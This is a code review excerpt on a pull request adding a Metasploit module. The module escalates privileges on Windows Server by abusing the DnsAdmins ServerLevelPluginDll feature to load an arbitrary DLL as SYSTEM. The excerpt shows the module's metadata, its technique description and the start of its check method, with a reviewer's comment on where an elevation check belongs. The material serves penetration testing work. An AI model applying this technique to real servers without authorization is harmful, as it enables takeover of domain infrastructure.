modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb

```diff
@@ -0,0 +1,193 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Services
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DnsAdmin ServerLevelPluginDLL Feature Abuse Privilege Escalation',
+      'Description'    => %q(
+        This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
+        ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\
+        named ServerLevelPluginDll that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
+        and cause it to execute, providing us with SYSTEM privileges. Using the Metasploit-generated DLL will cause the service to become
+        unresponsive, and will require removing the registry key and rebooting to get it working again.
+      ),
+      'References'     =>
+        [
+          ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'],
+          ['URL', 'https://adsecurity.org/?p=4064'],
+          ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html']
+        ],
+      'DisclosureDate' => "May 08 2017",
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Shay Ber', # vulnerability discovery
+          'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
+        ],
+      'Platform'       => 'win',
+      'Targets'        => [[ 'Automatic', {} ]],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 10 })
+    )
+
+    register_options(
+      [
+        OptString.new('DLLNAME', [ false, 'DLL name (default: msf.dll)', "msf.dll"]),
+        OptString.new('DLLPATH', [ false, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', "%TEMP%"])
+      ]
+    )
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def check
+    if is_system?
+      print_status("Session is already elevated!")
+      return Exploit::CheckCode::Unknown
+    end
```

Comment:
Usually the `is_system` check is performed within the `exploit` method. This allows the module `check` method to be used as a primitive vulnerability scanner. Sometimes it's nice to know that the system is vulnerable, even if we are already elevated.

```ruby
    if is_system?
      fail_with(Failure::BadConfig, "Session is already elevated!")
    end
```

Edit: Oh, you're already performing this check in the `exploit` method. In that case, let's not do it twice:

```suggestion
```